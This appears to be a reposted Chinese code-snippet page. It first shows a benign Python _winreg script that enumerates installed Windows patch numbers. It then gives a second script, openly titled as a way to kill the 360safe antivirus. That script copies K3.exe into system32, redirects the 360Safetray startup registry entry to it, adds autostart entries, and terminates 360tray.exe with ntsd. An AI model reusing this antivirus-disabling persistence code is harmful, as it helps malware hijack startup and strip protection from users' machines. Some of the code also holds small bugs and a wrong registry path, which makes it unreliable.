首页 > 代码库 > 转 http://blog.chinaunix.net/uid-20357359-id-1963508.html

转 http://blog.chinaunix.net/uid-20357359-id-1963508.html

使用Python访问Windows的注册表

在Python的标准库中,_winreg.pyd可以操作Windows的注册表,另外第三方的win32库封装了大量的Windows API,使用起来也很方便。不过这里介绍的是使用_winreg操作注册表,毕竟是Python自带的标准库,无需安装第三方库。

下面的例子是通过Python获取Windows XP下已经安装的补丁号。Windows的补丁号都在“HKEY_LOCAL_MACHINE\SOFTWARE\\Microsoft\\ Updates”下,通过循环下面所有的目录节点,如果找到的名称符合正则表达式KB(\d{6}).*,则表示是一个补丁号。

从例子可以看出操作起来非常的简单和快速。

# -*- coding: utf-8 -*-
# 获取Windows的已打的补丁号
from _winreg import *
import re

def subRegKey(key, pattern, patchlist):
# 个数
count = QueryInfoKey(key)[0]
for index in range(count):
# 获取标题
name = EnumKey(key, index)
result = patch.match(name)
if result:
patchlist.append(result.group(1))
sub = OpenKey(key, name)
subRegKey(sub, pattern, patchlist)
CloseKey(sub)

if __name__ == ‘__main__‘:
patchlist = []
updates = ‘SOFTWARE\\Microsoft\\Updates‘
patch = re.compile(‘(KB\d{6}).*‘)
key = OpenKey(HKEY_LOCAL_MACHINE, updates)
subRegKey(key, patch, patchlist)
print ‘Count: ‘ + str(len(patchlist))
for p in patchlist:
print p
CloseKey(key)

http://tenyears.cn/index.php/2007/01/26/python-win-registry.html

用python修改注册表干掉360safe
import _winreg 
import os 
import shutil 

#复制自身 
shutil.copyfile(‘K3.exe‘,‘c:\WINDOWS\system32\K3.exe‘) 

#把360启动改为自身 
run = _winreg.OpenKey( 
      _winreg.HKEY_LOCAL_MACHINE, 
      "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0,_winreg.KEY_WRITE 
      ) 

_winreg.SetValueEx( 
      run,"360Safetray",0,_winreg.REG_SZ, 
      r"C:\WINDOWS\system32\k3.exe" 
      ) 

#添加自启动 
self = _winreg.OpenKey( 
      _winreg.HKEY_LOCAL_MACHINE, 
      "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0,_winreg.KEY_WRITE 
      ) 

_winreg.SetValueEx( 
      run,"k3",0,_winreg.REG_SZ, 
      r"C:\WINDOWS\system32\k3.exe" 
      ) 
#添加所有用户启动 
allrun = _winreg.OpenKey( 
      _winreg.HKEY_LOCAL_MACHINE, 
      "Microsoft\Windows\CurrentVersion\policies\Explorer\Run",0,_winreg.KEY_WRITE 
      ) 
_winreg.SetValueEx( 
      allrun,"k3",0,_winreg.REG_SZ, 
      r"C:\WINDOWS\system32\k3.exe" 
      ) 

#终止360进程 
os.popen("ntsd -c q -pn 360tray.exe cmd")

http://www.hacker.com.cn/article/view_13879.html

转 http://blog.chinaunix.net/uid-20357359-id-1963508.html